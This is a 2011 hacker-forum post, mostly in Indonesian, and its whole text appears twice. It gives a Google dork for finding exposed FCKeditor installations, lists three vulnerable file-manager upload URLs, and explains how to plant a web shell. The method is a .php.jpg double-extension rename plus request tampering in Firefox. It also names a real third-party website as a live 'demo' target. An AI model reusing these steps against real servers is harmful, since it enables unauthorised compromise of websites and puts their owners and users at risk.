10-20-2011, 12:16 PM
Dork : inurl:"/cms/FCKeditor/"
Author : Don-po
Share Day : 21-0ktober-2011
Thx : Google,Don-po,All Hacker,Member C3
---------------------------------------------------
Cara Sebagai Berikut :
Open Dork Di google
Exploit :
-http://site/[path or Not]/FCKeditor/editor/filemanager/browser/default/browser.html
-http://site/[Path or Not]/fckeditor/editor/filemanager/browser/default/frmupload.html
-http://site/[Path or Not]/fckeditor/editor/filemanager/browser/default/connectors/test.html
Upload : .jpg .jpeg .gif etc...
Kalau php tidak di perbolehkan! rename shell menjadi .php.jpg
Upload dengan tamper data yang ada di firefox...
-----------------------------------------------------------------------
Demo :
-http://www.blissfengshui.com.au/cms/FCKeditor/editor/filemanager/browser/default/browser.html
Greetz : Eastjavahacker,Chibi-cyber,All Hacker.
Author : Don-po
Share Day : 21-0ktober-2011
Thx : Google,Don-po,All Hacker,Member C3
---------------------------------------------------
Cara Sebagai Berikut :
Open Dork Di google
Exploit :
-http://site/[path or Not]/FCKeditor/editor/filemanager/browser/default/browser.html
-http://site/[Path or Not]/fckeditor/editor/filemanager/browser/default/frmupload.html
-http://site/[Path or Not]/fckeditor/editor/filemanager/browser/default/connectors/test.html
Upload : .jpg .jpeg .gif etc...
Kalau php tidak di perbolehkan! rename shell menjadi .php.jpg
Upload dengan tamper data yang ada di firefox...
-----------------------------------------------------------------------
Demo :
-http://www.blissfengshui.com.au/cms/FCKeditor/editor/filemanager/browser/default/browser.html
Greetz : Eastjavahacker,Chibi-cyber,All Hacker.